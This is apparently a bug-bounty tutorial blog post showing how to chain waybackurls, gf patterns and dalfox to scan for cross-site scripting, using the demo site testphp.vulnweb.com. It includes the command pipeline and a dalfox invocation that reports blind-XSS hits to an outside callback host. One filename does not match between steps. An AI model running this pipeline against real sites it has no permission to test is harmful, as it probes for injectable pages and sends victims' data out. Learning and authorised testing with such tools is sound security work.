Automating XSS using Dalfox, GF and Waybackurls

Hello Everyone! 😄

Hope you all are good.

Automating Stuff is always fun so Why not XSS. All you need is “GO Lang” installed on your machine and you are ready to go.

Checkout Official Updated Guide on BugBlogs

Pre-Requisites :

• GF by TomNomNom
• GF Patterns by Shiv Chouhan
• WayBackURLs by TomNomNom
• Dalfox by HAHWUL

Workflow

• After Installation of all above mentioned tools, Choose your Target. Let’s use “http://testphp.vulnweb.com/” for demonstration purposes.
• Use Waybackurls to fetch URL’s for the chosen target and save the Output in a text file.

echo “testphp.vulnweb.com” | waybackurls | tee testphp.txt

• Use GF Patterns to find URLs that give you XSS and Use sed command to get our URLs ready for the Dalfox

cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt

• Time to fire Dalfox and start finding XSS.

dalfox file testxss.txt -b tigv2.xss.ht pipe

• Make sure you replace my Blind XSS Hunter Payload with that of yours.

Automating Workflow using bash

Check out the Bash Script to automate the workflow.

theinfosecguy/QuickXSS

Hope you guys like this. Do give it a Clap if liked it. 👏

Do check out my BugBlogs for more amazing Writeups and Blogs: https://www.bugblogs.tech

Find me on:

LinkedIn: http://linkedin.com/in/keshav-malik/

Twitter: https://twitter.com/g0t_rOoT_